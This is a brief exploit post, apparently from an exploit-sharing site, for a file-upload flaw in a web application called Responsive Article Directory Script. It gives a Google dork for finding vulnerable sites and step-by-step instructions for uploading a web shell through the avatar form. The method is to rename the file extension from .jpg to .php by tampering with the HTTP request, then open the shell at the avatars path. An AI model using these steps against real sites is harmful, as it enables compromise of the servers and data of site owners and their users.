Upload Shell Vulnerable

Google dork: intext:"Powered By Responsive Article Directory Script"

 

[#] Exploit

Register > http://{host}/register.php

Then go to > http://{host}/account.php and upload your shell in Avatar..

use Tamper Data addon to edit HTTP headers > change {filename}.jpg to {filename}.php

path: http://{host}/avatars/{user_id}.php